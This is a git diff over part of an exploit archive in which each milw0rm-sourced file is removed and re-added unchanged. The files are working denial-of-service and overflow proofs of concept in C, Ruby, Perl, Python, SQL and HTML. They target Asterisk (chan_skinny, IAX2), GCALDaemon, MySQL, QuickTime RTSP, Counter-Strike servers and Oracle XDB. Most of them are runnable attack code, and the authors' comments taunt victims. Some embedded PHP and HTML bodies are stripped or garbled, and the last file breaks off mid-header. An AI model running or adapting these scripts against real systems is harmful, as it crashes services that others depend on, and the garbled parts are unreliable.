*sc) -{ - struct skinny_client_message scm; - struct register_message *rm; - int len; - - rm = malloc(sizeof(struct register_message )) + 4; - - if (!rm) { - printf("we could not allocated space for the register message\n"); - return -1; - } - - len = sizeof(struct register_message); - scm.len = htonl(len); - scm.e = htonl(REGISTER_MESSAGE); - scm.data = (char *)rm; - strcpy(rm->name,"SEP0007EB463101\x00"); - rm->type = 30006; - skinny_client_sendmessage(sc,&scm); - skinny_client_read(sc); - return 0; -} - -int skinny_client_connect(struct skinny_client *sc) -{ - int ret; - sc->sd = socket(AF_INET,SOCK_STREAM,0); - if (sc->sd == -1) { - return -1; - } - sc->saddr.sin_family = AF_INET; - sc->saddr.sin_port = htons(SKINNY_TCP_PORT); - sc->saddr.sin_addr.s_addr = inet_addr(sc->rhost); - ret = connect(sc->sd, (struct sockaddr 
*)&sc->saddr,sizeof(struct sockaddr)); - if (ret != 0) { - printf("+++ UNABLE TO CONNECT TO REMOTE HOST 2000/TCP!\n"); - return -1; - } - printf("+++ CONNECTION OK\n"); - sc->active = 1; - return 0; -} - -int main(int argc, char **argv) -{ - int i; - struct skinny_client *sc; - pthread_attr_t attr; - sc = malloc(sizeof(struct skinny_client)); - memset(sc,0,sizeof(struct skinny_client)); - - for (i=0;irhost,argv[i+1]); - } - } - if (*sc->rhost == 0) { - printf("+++ You must run with the -h option\n"); - return 0; - } - skinny_client_connect(sc); - skinny_client_register(sc); - - return 0; -} - -// milw0rm.com [2007-07-18] +/* + * AstKilla2.c + * gcc -o astkilla2 astkilla2.c + * ./astkilla2 -h 216.246.**.*** + * In no event will the author of this source be liable for any loss or damage of a material or + * immaterial nature arising from access to, use or non-use of published information, or from misuse of the connection or technical faults. + + + chan_skinny runs on 2000/TCP if you find a host with this open there is a really decent chance it's a asterisk machine some admin + forgot to disable chan_skinny on (which is default).. this should be a to all of those who don't lock down what they dont need (what is this 1999 ?) + + this is really quite old but as it turns out someone made the bug public, how sad.. but eh there are more fish in sea ;) + well here is a exploit for everyone who didn't take a look at the code. 
+ + + -- = fbff = -- + +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SKINNY_TCP_PORT 2000 +#define CLEN 1024 +#define SKINNY_MAX_SIZE 1000 +#define REGISTER_MESSAGE 0x0001 +struct register_message { + char name[16]; + uint32_t userId; + uint32_t instance; + uint32_t ip; + uint32_t type; + uint32_t maxStreams; +}; +struct skinny_client { + int sd; + struct sockaddr_in saddr; + int active; + char rhost[CLEN]; + char username[CLEN]; + char password[CLEN]; + char packet[SKINNY_MAX_SIZE]; +}; +struct skinny_client_message { + int len; + int res; + int e; /* 12 bytes */ + char *data; +}; + +struct skinny_client *g_sc; +struct messages { + int e; + char *human; + int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm); +} message_list[] = { + {0x81,"Register Ack Message\n", NULL}, + {0x9b,"Capabilities Request Message\n",NULL}, + {0x9f,"Reset Message\n", NULL} +}; +int skinny_client_read(struct skinny_client *sc) +{ + int ret; + int elm; + int type; + int i; + char buf[SKINNY_MAX_SIZE]; + struct skinny_client_message scm; + memset(&scm,0x00,sizeof(struct skinny_client_message)); + memset(&buf,0x00,sizeof(buf)); + elm = (sizeof(message_list)/sizeof(struct messages)); + ret = read(sc->sd,&buf,sizeof(buf)); + if (ret == -1) { + printf("+++ GOOD NEWS THE REMOTE HOST IS DEAD! READ RETURNED -1 AND THE TCP CONNECTION HAS WENT BYEBYE\n"); + return -1; + } else if (ret < sizeof(struct skinny_client_message) - 4){ + printf("we got some data back from the server just to little of it!\n"); + } else { + printf("++++ THINGS BROKE BUT THE HOST MAY STILL BE UP. 
HOW SAD\n"); + } + + return 0; +} +int skinny_client_sendmessage(struct skinny_client *sc, struct skinny_client_message *scm) +{ + int res; + int len; + char *outbuf; + int test; + + len = 90; + scm->len = 3; + outbuf = malloc(len); + if (!outbuf) { + return -1; + } + memset(outbuf,0x41,len); + /* place the 12 bytes header into outbuf */ + memcpy(outbuf,scm,12); + /* place the data into outbuf */ + memcpy(outbuf+12,scm->data,len-12); + res = write(sc->sd,outbuf,len); + printf("++ Wrote %i bytes\n", res); + return 0; +} + +/* send out a client register message to the remote skinny node */ +int skinny_client_register(struct skinny_client *sc) +{ + struct skinny_client_message scm; + struct register_message *rm; + int len; + + rm = malloc(sizeof(struct register_message )) + 4; + + if (!rm) { + printf("we could not allocated space for the register message\n"); + return -1; + } + + len = sizeof(struct register_message); + scm.len = htonl(len); + scm.e = htonl(REGISTER_MESSAGE); + scm.data = (char *)rm; + strcpy(rm->name,"SEP0007EB463101\x00"); + rm->type = 30006; + skinny_client_sendmessage(sc,&scm); + skinny_client_read(sc); + return 0; +} + +int skinny_client_connect(struct skinny_client *sc) +{ + int ret; + sc->sd = socket(AF_INET,SOCK_STREAM,0); + if (sc->sd == -1) { + return -1; + } + sc->saddr.sin_family = AF_INET; + sc->saddr.sin_port = htons(SKINNY_TCP_PORT); + sc->saddr.sin_addr.s_addr = inet_addr(sc->rhost); + ret = connect(sc->sd, (struct sockaddr *)&sc->saddr,sizeof(struct sockaddr)); + if (ret != 0) { + printf("+++ UNABLE TO CONNECT TO REMOTE HOST 2000/TCP!\n"); + return -1; + } + printf("+++ CONNECTION OK\n"); + sc->active = 1; + return 0; +} + +int main(int argc, char **argv) +{ + int i; + struct skinny_client *sc; + pthread_attr_t attr; + sc = malloc(sizeof(struct skinny_client)); + memset(sc,0,sizeof(struct skinny_client)); + + for (i=0;irhost,argv[i+1]); + } + } + if (*sc->rhost == 0) { + printf("+++ You must run with the -h option\n"); + return 0; + } 
+ skinny_client_connect(sc); + skinny_client_register(sc); + + return 0; +} + +// milw0rm.com [2007-07-18] diff --git a/platforms/multiple/dos/4249.rb b/platforms/multiple/dos/4249.rb index a6bb788ab..a33f5b3ce 100755 --- a/platforms/multiple/dos/4249.rb +++ b/platforms/multiple/dos/4249.rb 
@@ -1,171 +1,171 @@ -#!/usr/bin/env ruby -# author = tenkei_ev -# Script to test chan_iax for the vuln in ASA-2007-015 -# Trigger subtypes of 11 or 12 will crash an unpatched server -# -# First establish a call - send new, recv accept, send ack, recv answer, send ack -# Then send IAX2 control packets with subtypes 0x0b or 0x0c that contain an information element -# If asterisk sends an ACK to the trigger, it didn't crash -# If no ACK is read off the socket during the timeout, consider asterisk to be crashed -# -# If any of the expected responses aren't received, asterisk may not crash when sending the trigger -# -# Updated: fix bug in crash detection with patched servers - -require 'socket' -require 'timeout' - -hostname = nil -trigger_subtype = nil - -if(ARGV.length < 2 ) - $stderr.puts "#{$0} \r\n" - exit -1 -else - hostname = ARGV[0] - if(ARGV[1][0,2] == '0x' || ARGV[1][0,2] == '0X') - trigger_subtype = ARGV[1].hex - else - trigger_subtype = ARGV[1].to_i - end -end - -t = UDPSocket.new -t.connect(hostname,4569) - -puts "[*] Sending NEW #{hostname}" -iax2_new = - [ - # HEADER - 1 << 15 | 1, # full-frame bit and source call number - 0, # retransmit bit and destination call number - 0, # timestamp - 0, # outbound stream sequence number - 0, # inbound stream sequence number - need to reset to 0 - 0x06, # Frame type - IAX2 Control frame - 1, # IAX2 NEW, C bit unset - - # VERSION IE - 0x0b, - 0x02, - 0x02, - - # FORMAT IE - # trying to match asterisk - ymmv if your asterisk server rejects you, - # change this to match some codecs asterisk expects - 0x09, - 0x04, - 0xe703, - ].pack("nnNCCCC CCn CCN") - -t.write(iax2_new) - -iax2_accept,sender = t.recvfrom(1024) -resp = iax2_accept.unpack("nnNCCCCCCN") -srccall = resp[0] & 0x7fff -dstcall = resp[1] & 0x7fff -timestamp = resp[2] -oseq = resp[3] -iseq = resp[4] -frametype = resp[5] -subtype = resp[6] - -if(frametype == 6 && subtype == 7) - puts "[*] ACCEPT received from #{hostname}" -else - puts "[!] 
Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" -end - -puts "[*] Sending ACK" -iax2_ack = - [ - 1 << 15 | dstcall & 0x7fff, - 0 << 15 | srccall & 0x7fff, - timestamp.to_i + 1000, - iseq, - oseq, - 0x06, # IAX2 Control frame - 0 << 7 | 0x04 & 0x7f, # IAX2 ACK - ].pack("nnNCCCC") - -t.write(iax2_ack) - -iax2_answer,sender = t.recvfrom(1024) -resp = iax2_answer.unpack("nnNCCCCCCN") -srccall = resp[0] & 0x7fff -dstcall = resp[1] & 0x7fff -timestamp = resp[2] -oseq = resp[3] -iseq = resp[4] -frametype = resp[5] -subtype = resp[6] - -if(frametype == 4 && subtype == 4) - puts "[*] ANSWER received from #{hostname}" -else - puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" -end - -puts "[*] Sending ACK" -iax2_ack = - [ - 1 << 15 | dstcall & 0x7fff, - 0 << 15 | srccall & 0x7fff, - timestamp.to_i + 1000, - iseq, - oseq, - 0x06, # IAX2 Control frame - 0 << 7 | 0x04 & 0x7f, # IAX2 ACK, C bit unset - ].pack("nnNCCCC") - -t.write(iax2_ack) - -puts "[*] Sending trigger" -trigger = - [ - 1 << 15 | dstcall & 0x7fff, - 0 << 15 | srccall & 0x7fff, - timestamp.to_i + 1000, - iseq, - oseq, - 0x06, - trigger_subtype, - - # IE - 0x0b, - 0x02, - 0x02, - - ].pack("nnNCCCC CCn ") - -t.write(trigger) - -begin - - timeout_seconds = 2 - - Timeout::timeout(timeout_seconds) do |tlength| - while(trigger_ack = t.recvfrom(1024)) - resp = trigger_ack[0].unpack("nnNCCCCCCN") - srccall = resp[0] & 0x7fff - dstcall = resp[1] & 0x7fff - timestamp = resp[2] - oseq = resp[3] - iseq = resp[4] - frametype = resp[5] - subtype = resp[6] - if((frametype == 6 && subtype == 4) || (frametype == 6 && subtype == 12)) - puts "[!] Asterisk survived" - exit - end - end - end - -rescue Timeout::Error => e - puts "[!!!] 
Asterisk died" -rescue ::Exception => e -end - -t.close - -# milw0rm.com [2007-07-31] +#!/usr/bin/env ruby +# author = tenkei_ev +# Script to test chan_iax for the vuln in ASA-2007-015 +# Trigger subtypes of 11 or 12 will crash an unpatched server +# +# First establish a call - send new, recv accept, send ack, recv answer, send ack +# Then send IAX2 control packets with subtypes 0x0b or 0x0c that contain an information element +# If asterisk sends an ACK to the trigger, it didn't crash +# If no ACK is read off the socket during the timeout, consider asterisk to be crashed +# +# If any of the expected responses aren't received, asterisk may not crash when sending the trigger +# +# Updated: fix bug in crash detection with patched servers + +require 'socket' +require 'timeout' + +hostname = nil +trigger_subtype = nil + +if(ARGV.length < 2 ) + $stderr.puts "#{$0} \r\n" + exit -1 +else + hostname = ARGV[0] + if(ARGV[1][0,2] == '0x' || ARGV[1][0,2] == '0X') + trigger_subtype = ARGV[1].hex + else + trigger_subtype = ARGV[1].to_i + end +end + +t = UDPSocket.new +t.connect(hostname,4569) + +puts "[*] Sending NEW #{hostname}" +iax2_new = + [ + # HEADER + 1 << 15 | 1, # full-frame bit and source call number + 0, # retransmit bit and destination call number + 0, # timestamp + 0, # outbound stream sequence number + 0, # inbound stream sequence number - need to reset to 0 + 0x06, # Frame type - IAX2 Control frame + 1, # IAX2 NEW, C bit unset + + # VERSION IE + 0x0b, + 0x02, + 0x02, + + # FORMAT IE + # trying to match asterisk - ymmv if your asterisk server rejects you, + # change this to match some codecs asterisk expects + 0x09, + 0x04, + 0xe703, + ].pack("nnNCCCC CCn CCN") + +t.write(iax2_new) + +iax2_accept,sender = t.recvfrom(1024) +resp = iax2_accept.unpack("nnNCCCCCCN") +srccall = resp[0] & 0x7fff +dstcall = resp[1] & 0x7fff +timestamp = resp[2] +oseq = resp[3] +iseq = resp[4] +frametype = resp[5] +subtype = resp[6] + +if(frametype == 6 && subtype == 7) + puts "[*] ACCEPT 
received from #{hostname}" +else + puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" +end + +puts "[*] Sending ACK" +iax2_ack = + [ + 1 << 15 | dstcall & 0x7fff, + 0 << 15 | srccall & 0x7fff, + timestamp.to_i + 1000, + iseq, + oseq, + 0x06, # IAX2 Control frame + 0 << 7 | 0x04 & 0x7f, # IAX2 ACK + ].pack("nnNCCCC") + +t.write(iax2_ack) + +iax2_answer,sender = t.recvfrom(1024) +resp = iax2_answer.unpack("nnNCCCCCCN") +srccall = resp[0] & 0x7fff +dstcall = resp[1] & 0x7fff +timestamp = resp[2] +oseq = resp[3] +iseq = resp[4] +frametype = resp[5] +subtype = resp[6] + +if(frametype == 4 && subtype == 4) + puts "[*] ANSWER received from #{hostname}" +else + puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" +end + +puts "[*] Sending ACK" +iax2_ack = + [ + 1 << 15 | dstcall & 0x7fff, + 0 << 15 | srccall & 0x7fff, + timestamp.to_i + 1000, + iseq, + oseq, + 0x06, # IAX2 Control frame + 0 << 7 | 0x04 & 0x7f, # IAX2 ACK, C bit unset + ].pack("nnNCCCC") + +t.write(iax2_ack) + +puts "[*] Sending trigger" +trigger = + [ + 1 << 15 | dstcall & 0x7fff, + 0 << 15 | srccall & 0x7fff, + timestamp.to_i + 1000, + iseq, + oseq, + 0x06, + trigger_subtype, + + # IE + 0x0b, + 0x02, + 0x02, + + ].pack("nnNCCCC CCn ") + +t.write(trigger) + +begin + + timeout_seconds = 2 + + Timeout::timeout(timeout_seconds) do |tlength| + while(trigger_ack = t.recvfrom(1024)) + resp = trigger_ack[0].unpack("nnNCCCCCCN") + srccall = resp[0] & 0x7fff + dstcall = resp[1] & 0x7fff + timestamp = resp[2] + oseq = resp[3] + iseq = resp[4] + frametype = resp[5] + subtype = resp[6] + if((frametype == 6 && subtype == 4) || (frametype == 6 && subtype == 12)) + puts "[!] Asterisk survived" + exit + end + end + end + +rescue Timeout::Error => e + puts "[!!!] Asterisk died" +rescue ::Exception => e +end + +t.close + +# milw0rm.com [2007-07-31] diff --git a/platforms/multiple/dos/4260.php b/platforms/multiple/dos/4260.php index 4091a8e45..92ffae7b2 100755 
--- a/platforms/multiple/dos/4260.php +++ b/platforms/multiple/dos/4260.php @@ -1,24 +1,24 @@ - 42424242 - -?> - -# milw0rm.com [2007-08-06] + 42424242 + +?> + +# milw0rm.com [2007-08-06] diff --git a/platforms/multiple/dos/4432.html b/platforms/multiple/dos/4432.html index 0ee7a9d4d..7be50d870 100755 --- a/platforms/multiple/dos/4432.html +++ b/platforms/multiple/dos/4432.html @@ -1,20 +1,20 @@ - - -
-Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC
-Bug founded and code released by Yag Kohha.
-Greetz to:
-Shinnai, Str0ke
- -
- - - - - -# milw0rm.com [2007-09-19] + + +
+Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC
+Bug founded and code released by Yag Kohha.
+Greetz to:
+Shinnai, Str0ke
+ +
+
+
+
+
+
+# milw0rm.com [2007-09-19]
diff --git a/platforms/multiple/dos/4540.pl b/platforms/multiple/dos/4540.pl
index 5567cb9b8..b6b7a63db 100755
--- a/platforms/multiple/dos/4540.pl
+++ b/platforms/multiple/dos/4540.pl
@@ -1,30 +1,30 @@
-#!/usr/bin/perl
-# /*
-# * GCALDaemon <= 1.0-beta13 Remote DoS
-# *
-# * Original Advisory:
-# * http://www.securityfocus.com/bid/25704/info
-# * http://www.ikkisoft.com/stuff/SN-2007-01.txt
-# *
-# * Luca "ikki" Carettoni
-# * http://www.ikkisoft.com
-# */
-
-use strict;
-use warnings;
-use IO::Socket;
-
-my $host = shift || die "Usage: $0 host [port]\n";
-my $port = shift || 9090;
-my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port,
-PeerProto => 'tcp')
-or die "error: $!\n";
-print "GCALDaemom DoS Expoit\n";
-print "Just 4 seconds...\n";
-sleep 4;
-$sock->send("GET / HTTP/1.1\r\n");
-$sock->send("Content-Length: 1000000000\r\n\r\n");
-$sock->close;
-print "\n\nNo more sync!\n";
-
-# milw0rm.com [2007-10-16]
+#!/usr/bin/perl
+# /*
+# * GCALDaemon <= 1.0-beta13 Remote DoS
+# *
+# * Original Advisory:
+# * http://www.securityfocus.com/bid/25704/info
+# * http://www.ikkisoft.com/stuff/SN-2007-01.txt
+# *
+# * Luca "ikki" Carettoni
+# * http://www.ikkisoft.com
+# */
+
+use strict;
+use warnings;
+use IO::Socket;
+
+my $host = shift || die "Usage: $0 host [port]\n";
+my $port = shift || 9090;
+my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port,
+PeerProto => 'tcp')
+or die "error: $!\n";
+print "GCALDaemom DoS Expoit\n";
+print "Just 4 seconds...\n";
+sleep 4;
+$sock->send("GET / HTTP/1.1\r\n");
+$sock->send("Content-Length: 1000000000\r\n\r\n");
+$sock->close;
+print "\n\nNo more sync!\n";
+
+# milw0rm.com [2007-10-16]
diff --git a/platforms/multiple/dos/4615.txt b/platforms/multiple/dos/4615.txt
index b381516ac..7f868025d 100755
--- a/platforms/multiple/dos/4615.txt
+++ b/platforms/multiple/dos/4615.txt
@@ -1,30 +1,30 @@
-/*
- * MySQL <=6.0 possibly affected
- * Kristian Erik Hermansen
- * Credit: Joe Gallo
- * You must have ALTER permissions to exploit this bug!
- * Scenario: You found SQL injection, but you want to punch backend server
- * in the nuts just for fun. Start with the ALTER TABLE statement on
- * a table and field you know to exist. The first two SQL statements are
- * simply to demostrate reproducibility...
- */
-
-
-mysql> CREATE TABLE `test` (
- `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
- `foo` text NOT NULL
-) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-Query OK, 0 rows affected
-
-mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
-Empty set
-
-mysql> ALTER TABLE test ADD INDEX (foo(100));
-Query OK, 0 rows affected
-Records: 0 Duplicates: 0 Warnings: 0
-
-mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
-ERROR 2013 : Lost connection to MySQL server during query
-
-
-# milw0rm.com [2007-11-09]
+/*
+ * MySQL <=6.0 possibly affected
+ * Kristian Erik Hermansen
+ * Credit: Joe Gallo
+ * You must have ALTER permissions to exploit this bug!
+ * Scenario: You found SQL injection, but you want to punch backend server
+ * in the nuts just for fun. Start with the ALTER TABLE statement on
+ * a table and field you know to exist. The first two SQL statements are
+ * simply to demostrate reproducibility...
+ */
+
+
+mysql> CREATE TABLE `test` (
+ `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
+ `foo` text NOT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=latin1;
+Query OK, 0 rows affected
+
+mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
+Empty set
+
+mysql> ALTER TABLE test ADD INDEX (foo(100));
+Query OK, 0 rows affected
+Records: 0 Duplicates: 0 Warnings: 0
+
+mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
+ERROR 2013 : Lost connection to MySQL server during query
+
+
+# milw0rm.com [2007-11-09]
diff --git a/platforms/multiple/dos/4648.py b/platforms/multiple/dos/4648.py
index ec98c94dd..cd5466e11 100755
--- a/platforms/multiple/dos/4648.py
+++ b/platforms/multiple/dos/4648.py
@@ -1,75 +1,75 @@ -#!/usr/bin/python -# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit -# Bug discovered by Krystian Kloskowski (h07) -# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish -# Details:.. -# -# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n -# -# 0x41414141 Pointer to next SEH record -# 0x42424242 SE handler -# -# ---------------------------------------------------------------- -# Exception C0000005 (ACCESS_VIOLATION reading [42424242]) -# ---------------------------------------------------------------- -# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 -# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00 -# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00 -# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? 
-# --> N/A -# ---------------------------------------------------------------- -## - -from socket import * - -header = ( -'RTSP/1.0 200 OK\r\n' -'CSeq: 1\r\n' -'Date: 0x00 :P\r\n' -'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' -'Content-Type: %s\r\n' # <-- overflow -'Content-Length: %d\r\n' -'\r\n') - -body = ( -'v=0\r\n' -'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' -'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'i=1.mp3\r\n' -'t=0 0\r\n' -'a=tool:ciamciaramcia\r\n' -'a=type:broadcast\r\n' -'a=control:*\r\n' -'a=range:npt=0-213.077\r\n' -'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'a=x-qt-text-inf:1.mp3\r\n' -'m=audio 0 RTP/AVP 14\r\n' -'c=IN IP4 0.0.0.0\r\n' -'a=control:track1\r\n' -) - -tmp = "A" * 995 -tmp += "B" * 4096 -header %= (tmp, len(body)) -evil = header + body - -s = socket(AF_INET, SOCK_STREAM) -s.bind(("0.0.0.0", 554)) -s.listen(1) -print "[+] Listening on [RTSP] 554" -c, addr = s.accept() -print "[+] Connection accepted from: %s" % (addr[0]) -c.recv(1024) -c.send(evil) -raw_input("[+] Done, press enter to quit") -c.close() -s.close() - -# EoF - -# milw0rm.com [2007-11-23] +#!/usr/bin/python +# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit +# Bug discovered by Krystian Kloskowski (h07) +# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish +# Details:.. +# +# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n +# +# 0x41414141 Pointer to next SEH record +# 0x42424242 SE handler +# +# ---------------------------------------------------------------- +# Exception C0000005 (ACCESS_VIOLATION reading [42424242]) +# ---------------------------------------------------------------- +# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? 
+# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 +# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00 +# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00 +# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# --> N/A +# ---------------------------------------------------------------- +## + +from socket import * + +header = ( +'RTSP/1.0 200 OK\r\n' +'CSeq: 1\r\n' +'Date: 0x00 :P\r\n' +'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' +'Content-Type: %s\r\n' # <-- overflow +'Content-Length: %d\r\n' +'\r\n') + +body = ( +'v=0\r\n' +'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' +'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'i=1.mp3\r\n' +'t=0 0\r\n' +'a=tool:ciamciaramcia\r\n' +'a=type:broadcast\r\n' +'a=control:*\r\n' +'a=range:npt=0-213.077\r\n' +'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'a=x-qt-text-inf:1.mp3\r\n' +'m=audio 0 RTP/AVP 14\r\n' +'c=IN IP4 0.0.0.0\r\n' +'a=control:track1\r\n' +) + +tmp = "A" * 995 +tmp += "B" * 4096 +header %= (tmp, len(body)) +evil = header + body + +s = socket(AF_INET, SOCK_STREAM) +s.bind(("0.0.0.0", 554)) +s.listen(1) +print "[+] Listening on [RTSP] 554" +c, addr = s.accept() +print "[+] Connection accepted from: %s" % (addr[0]) +c.recv(1024) +c.send(evil) +raw_input("[+] Done, press enter to quit") +c.close() +s.close() + +# EoF + +# milw0rm.com [2007-11-23] diff --git a/platforms/multiple/dos/4856.php b/platforms/multiple/dos/4856.php index a47bc0b04..7f5fedf88 100755 --- a/platforms/multiple/dos/4856.php +++ b/platforms/multiple/dos/4856.php 
@@ -1,187 +1,187 @@ -----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] - - Counter Strike 1.6 Denial Of Service POC - Eugene Minaev underwater@itdefence.ru - Bug was found by Maxim Suhanov ( THE FUF ) - works only with no-steam servers - ___________________________________________________________________ - ____/ __ __ _______________________ _______ _______________ \ \ \ - / .\ / /_// // / \ \/ __ \ /__/ / - / / /_// /\ / / / / /___/ - \/ / / / / /\ / / / - / / \/ / / / / /__ //\ - \ / ____________/ / \/ __________// /__ // / - /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ - \ \\ // // / - .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . - . \_\\________[________________________________________]_________//_//_/ . . - - - - Counter Strike DOS POC (underwater@itdefence.ru) - - - - - - - -
-
- -
\n"' > kdie5.html +perl -e 'print "\n" . "\n"' > kdie6.html +perl -e 'print "\n" . "
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Host
Port
 Auth Type 2
Pass
 
-
- - -
ITDEFENCE / RUSSIA (http://itdefence.ru)
- - - - - -----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] - -# milw0rm.com [2008-01-06] +----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] + + Counter Strike 1.6 Denial Of Service POC + Eugene Minaev underwater@itdefence.ru + Bug was found by Maxim Suhanov ( THE FUF ) + works only with no-steam servers + ___________________________________________________________________ + ____/ __ __ _______________________ _______ _______________ \ \ \ + / .\ / /_// // / \ \/ __ \ /__/ / + / / /_// /\ / / / / /___/ + \/ / / / / /\ / / / + / / \/ / / / / /__ //\ + \ / ____________/ / \/ __________// /__ // / + /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ + \ \\ // // / + .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . + . \_\\________[________________________________________]_________//_//_/ . . + + + + Counter Strike DOS POC (underwater@itdefence.ru) + + + + + + + +
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Host
Port
 Auth Type 2
Pass
 
+
+
+
+
ITDEFENCE / RUSSIA (http://itdefence.ru)
+ + + + + +----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] + +# milw0rm.com [2008-01-06] diff --git a/platforms/multiple/dos/4997.sql b/platforms/multiple/dos/4997.sql index 522b01b02..361d25455 100755 --- a/platforms/multiple/dos/4997.sql +++ b/platforms/multiple/dos/4997.sql 
@@ -1,56 +1,56 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ -/******* BUFFER OVERFLOW *********/ -/******************************************************************/ -/************ POC exploit , Crash database **************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 28, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ -/* thanks to oraclefun for his pitrig_dropmetadata exploit */ -/* */ -/******************************************************************/ - - -set serveroutput on -declare - buff varchar2(32767); - begin - /* generate evil buffer */ - buff:='12345678901234567890123456789'; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||'0012345678901234567890123sh2kerr'; - /* lets see the buffer size */ - dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); - xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); - end; - / - - -/* P.S. 
xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */ - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ +/******* BUFFER OVERFLOW *********/ +/******************************************************************/ +/************ POC exploit , Crash database **************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* 